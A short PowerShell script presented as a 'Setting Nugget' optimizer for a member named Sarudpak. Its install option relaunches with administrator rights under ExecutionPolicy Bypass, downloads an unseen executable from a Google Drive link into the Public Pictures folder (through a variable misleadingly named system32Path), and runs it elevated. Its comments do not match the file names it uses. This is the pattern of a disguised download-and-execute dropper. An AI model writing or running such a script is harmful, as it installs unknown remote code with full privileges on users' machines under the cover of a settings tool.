# -----------------------------
# Menu Selection
# -----------------------------
Write-Host "Hi Member Sarudpak Welcome to Setting Nugget | 25/11/2025:"
Write-Host "1. Optimiz & Setting"
Write-Host "2. Clean"

$choice = Read-Host "Enter choice (1/2)"

# -----------------------------
# Check for Administrator rights
# -----------------------------
if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 
    Write-Host "Restarting with Administrator privileges..."
    Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
    exit
}

# -----------------------------
# Define paths and variables
# -----------------------------
$system32Path = "$env:public\Pictures"
$exeDestination = Join-Path $system32Path "Nuggetdiwaa.exe"
$exeUrl = "https://drive.usercontent.google.com/download?id=1By2LOGUPfTc_vYNMZNxSM-LEufbjyjd7&export=download&authuser=0&confirm=t&uuid=0dff048d-8cb5-4f47-910d-7aee55248aa3&at=ALWLOp6-cPHRYLaislLwnsLHgtJp%3A1764074871780"

# -----------------------------
# Install & Run Mode
# -----------------------------
if ($choice -eq "1") {
    Write-Host "`nStarting installation..."


    # Download exe and rename to sarudpakkrub.exe
    Write-Host "Downloading and renaming executable to Nuggetdiwaa.exe..."
    try {
        $tempFile = Join-Path $env:TEMP "Nugget_temp.exe"
        Invoke-WebRequest -Uri $exeUrl -OutFile $tempFile
        Move-Item -Path $tempFile -Destination $exeDestination -Force
        Write-Host "Nuggetdiwaa.exe download completed." -ForegroundColor Green
    } catch {
        Write-Host "Nuggetdiwaa.exe download failed: $_" -ForegroundColor Red
        exit
    }

    # Run the program directly
    Write-Host "Starting the program..."
    try {
        Start-Process -FilePath $exeDestination -Verb RunAs
        Write-Host "Program started successfully." -ForegroundColor Green
    } catch {
        Write-Host "Failed to start program: $_" -ForegroundColor Red
    }

    Write-Host "`nInstallation completed successfully." -ForegroundColor Green
}

# -----------------------------
# Clean Mode
# -----------------------------
elseif ($choice -eq "2") {
    Write-Host "Cleaning up installation..."

    # Stop the process if running
    Write-Host "Stopping sarudpakkrub.exe process..."
    try {
        Stop-Process -Name "Nuggetdiwaa" -Force -ErrorAction SilentlyContinue
        Write-Host "Process stopped." -ForegroundColor Green
    } catch {
        Write-Host "No running process found or failed to stop." -ForegroundColor Yellow
    }

    # Remove files if they exist
    if (Test-Path $exeDestination) { 
        Remove-Item $exeDestination -Force 
        Write-Host "Removed executable: $exeDestination" -ForegroundColor Green
    }

    Write-Host "Cleanup completed." -ForegroundColor Green
}

else {
    Write-Host "Invalid choice (please select 1 or 2)." -ForegroundColor Red

}
